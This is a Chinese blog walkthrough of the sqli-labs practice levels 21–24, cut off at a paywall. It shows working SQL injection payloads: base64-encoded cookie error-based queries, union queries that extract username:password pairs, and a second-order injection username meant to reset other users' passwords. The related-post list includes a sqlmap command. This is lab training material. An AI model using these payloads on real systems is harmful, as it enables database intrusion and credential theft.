sqli-labs 21-28

最新推荐文章于 2024-07-31 17:35:08 发布
最新推荐文章于 2024-07-31 17:35:08 发布
阅读量282 收藏
点赞数
分类专栏: injection 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asdf_yuanfang/article/details/121886758
版权
本文详细介绍了sqli-labs的Less-21到Less-28的SQL注入挑战,涵盖了联合查询、替代注入、报错注入等技术,通过实例演示了如何利用注入漏洞获取数据库信息和控制权限。
摘要由CSDN通过智能技术生成

Less-21

1.直接用我们知道的用户名密码都为:admin的进行尝试,发现:

2.发现Cookie为:uname = YWRtaW4=说明对其进行了base64编码,那就编码看看:在线编码解码
YWRtaW4=就是admin,确实是base64编码,那就是说构造的语句也要进行base64编码。

还是在Cookie中构造:uname=admin' and extractvalue(1,concat('~',(select database()))) #编码后
uname=YWRtaW4nIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAj

结果报错,说明不止是单引号闭合,多了一个单引号,尝试加个括号:uname=admin') and extractvalue(1,concat('~',(select database()))) #编码后
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCd+Jywoc2VsZWN0IGRhdGFiYXNlKCkpKSkgIw==

没用提错,说明为单引号加括号闭合。可是并没有回显我们需要的内容,看来这构造行不通。改一改,不直接用database() 构造为:admin') and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 0,1))) # 编码后YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

成功,这里用database()不行,因为自己太菜,目前也说不出个为什么,希望知道的大佬指点一下。之所以在这里从新构造,是因为下面的构造在开始时,用的也是database(),结果提示超过一行,但想着database()应该就是指security好像不需要limit n,1来限制,所以从新构造成这个形式。

3.换一种构造试试:admin') and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)#
编码后:YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

成功,剩下的稍微改改就好,改来改去,转来转去的,试得头疼。这题好像还提示日期配置错误,忙着做题了,没来的急处理,请大家自行忽略。后来查了一下,解决方法为:It is not safe to rely on the the system’s timezone settings解决方法 下面的已经处理好。

Less-22

1.先用我们知道的用户名密码都为:admin的进行尝试,发现:

感觉和Less-21相似,连返回的图片显示的都是SQLI DUMB SERIES-21(可能是弄错了)

2.那还是先尝试Cookie:把Less-21的语句提交看一下:admin') and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)#
编码后:YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

提示出错,应该是闭合方式不同。

3.尝试为双引号:admin" and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)# 编码后:YWRtaW4iIGFuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDAsMSksJzsnLGZsb29yKHJhbmQoKSoyKSkgYXMgeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhcyBhKSM=

成功。

Less-23

1.加单引号/加单引号加注释:http://localhost:8088/sqlilabs/Less-23/?id=1' --+都提示同样的错误:

也就是说注释符不起作用,可能是过滤了。

2.那通过语句闭合试试:成功http://localhost:8088/sqlilabs/Less-23/?id=1' and '1'='1

3.用使用联合查询:http://localhost:8088/sqlilabs/Less-23/?id=1' union select 1,2 and '1'='1 一列一列加发现有三列,不然会报错。

4.构造获取数据库名:http://localhost:8088/sqlilabs/Less-23/?id=-1' union select 1,(select schema_name from information_schema.schemata limit 0,1), '3

5.直接给出最终构造:http://localhost:8088/sqlilabs/Less-23/?id=-1' union select 1,(select concat(username,':',password) from users limit 1,1), '3

Less-24

1.看提示为:second order injections *Real Treat* stored injections 就是二阶注入/真正的享受/存储注入的意思。
2.先进页面看看,发现可以新建用户和用户登录,那先建一个试试。创建成功:

3.登录,发现可以修改密码:

4.根据提示的存储注入,想到可以构造一个新用户名(经测试用户名未进行相应过滤),使在更新此用户名的密码时,更新到其他账户密码。具体实现,考虑到密码重置语句为:update table_name set password='new_password' where username='username' and password='password' ;构造用户名:admin' or '1'='1 ,创建。登录,修改密码时,执行的语句应该为:update ta

最低0.47元/天 解锁文章
SQli-labs 进阶 21-38关
感恩
09-15 389
SQLI-LAB less21~38
Sqli-Lab | Less 21-23
酉酉的博客
02-08 601
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
Sqlilabs-21
KAKA的博客
07-09 649
来到了第 21 关,看着 21 关,我知道,第一阶段快结束了,马上要到…啪…给我认真写博文… 这一关卡的题目给内容貌似一点都不符合…还是得从 cookie 下手,但肯定不跟20 关一样,通过提交正常的数据,我们可以看到,COOKIE 长的有点不太一样… Base64Decode 解码 YWRtaW4= 得到的结果是 admin,所以说后台将 COOKIE 进行了 Base64 的编码,所以构造 payload 时,应该在 cookie 类似于:[得先正确登入] uname=YWRtaW4nKSBhbm
SQLI DUMB SERIES-21
weixin_34175509的博客
04-14 249
Cookie Injection- Error Based- complex - string( 基于错误的复杂的字符型Cookie注入) (1)登录成功后有以下页面: 其中红圈内的字符为admin的BASED64编码后的字符。 (2)用burp抓包,再刷新浏览器。 寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs= 闭合方式为' )...
sqli-labs 21 - 30关
weixin_44843084的博客
05-29 493
sqli-labs 21 - 30关 less21 登陆后 cookie的uname值是base64加密 试了几次,格式是’) 依旧是3列 剩下的跟上题一样 less22 跟上一题一样,格式是" less23 又回到get了[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 闭合是’ 直接注释好像有什么问题(应该是被过滤了 语句可能是类似id=’$id’ limit 0,1?(好像真的是 这样是可以的 但是不能1' order by 4 and '1'='1(还是上图
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
Sqli-labs-maste 靶场的下载, phpStudy 下载
最新发布
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs第二十一关详解(这次用sqlmap)
金 帛的博客
05-09 2816
SQL靶场第二十一关答案详解,这次用sqlmap跑
sqli-labs第28关,28a关
weixin_46023655的博客
07-31 342
sqli-labs第2828a关
sqli-labs进阶篇 25_28
Lucky小小吴的小屋
01-30 1053
一、如何判断单/双引号注入? ?id=1' 报错了,一定是单引号注入 -- 解析下 ①如果是双引号注入:"XXX" 输入:?id=1" or 1=1 执行:"1" or 1=1 " 结果:报错 ②如果是单引号注入:'XXX' 输入:?id=1" or 1=1 执行:'?id=1" or 1=1' 结果:id=1,执行成功 二、如何判断闭合注入? 以单引号为例 三、怎么绕过一些字符? 一般是使用3种方法进行绕过,分别是URL编码、大小写、重写 (1)URL编码的常见字符 %09
SQL-labs的第28关——union和select被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-04 421
该关的空格、-和注释也别屏蔽了。这里是屏蔽union select这个组合而不是单个的union或select。并且该关不返回错误,所以不使用?id=1\,而且也不使用报错注入。
sqli-labs/Less-28
m0_71299382的博客
11-20 393
sqli-labs第二十八a关
SQL注入(2)——各种注入
realmels的博客
04-24 1018
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 上一篇讲了SQL手工注入及简单的检测,今天来讲解各种类型的注入。 这里配合先前搭建好的sqli-lab进行测试 报错注入 报错注入主要是通过使数据库报错,从而获取信息。 这里报错函数主要是updatexml、ex.
适用于前后端公用的SM2国密加密传输, JAVA + VUE
棒槌沟
05-11 8052
适用于前后端公用的SM2国密加密传输, JAVA + VUE
secret的知识
weixin_46837396的博客
03-26 1170
Secret 我们说ConfigMap这个资源对象是Kubernetes当中非常重要的一个对象,一般情况下ConfigMap是用来存储一些非安全的配置信息,如果涉及到一些安全相关的数据的话用ConfigMap就非常不妥了,因为ConfigMap是名为存储的,我们说这个时候我们就需要用到另外一个资源对象了:Secret,Secret用来保存敏感信息,例如密码、OAuth 令牌和 ssh key等等,将这些信息放在Secret中比放在Pod的定义中或者docker镜像中来说更加安全和灵活。 Secret有三种类
sqli-labs第22关基于cookie报错注入(base64转码)
qq_46527080的博客
12-25 494
第22关基于cookie报错注入 sqlmap 方法 python2 sqlmap.py -r 1.txt --cookie uname=YWRtaW4= --tech E --dbms mysql --tamper base64encode.py --batch -v 0 手注 一、判断注入点 通过源码我们可以发现,闭合点是双引号 然后我们基于21关进行构造语句 一、猜注入点: admin " and extractvalue(1,concat(0x7e,( 1),0x7e))# YWRtaW4gI
支持PHP7的sqli-labs靶场介绍
文件名称'sqli_labs_sqli-version-master'暗示这是一个包含了多种版本的SQL注入实验室,其中'sqli-version'可能指代不同阶段或难度级别的SQL注入练习,而'master'可能表示这是一个主版本或完整版本的文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烜奕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值